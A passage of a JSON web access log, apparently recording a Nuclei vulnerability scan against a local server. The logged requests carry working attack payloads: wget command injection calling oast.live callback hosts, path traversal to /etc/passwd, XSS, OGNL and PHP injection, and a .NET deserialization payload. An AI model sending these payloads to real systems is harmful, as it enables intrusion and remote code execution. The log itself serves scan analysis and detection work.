AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://c9oms3gsmpve1ijt0mc0kfraypcoiaiz8.oast.live/ HTTP/1.1","status":"502","body_bytes_sents":"556","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?s=/admin/Index/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9oms3gsmpve1ijt0mc0pqcxzd5rodn9x.oast.live%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c9oms3gsmpve1ijt0mc09a8gs5ez1ukfd.oast.live%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.303","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.972","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.334","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://c9oms3gsmpve1ijt0mc018bjqyjx1hnph.oast.live/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.257","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.dockercfg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.279","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.278","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.258","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.099","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?s=/index/index/name/$%7B@phpinfo()%7D HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wiki/pages/createpage-entervariables.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:02 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0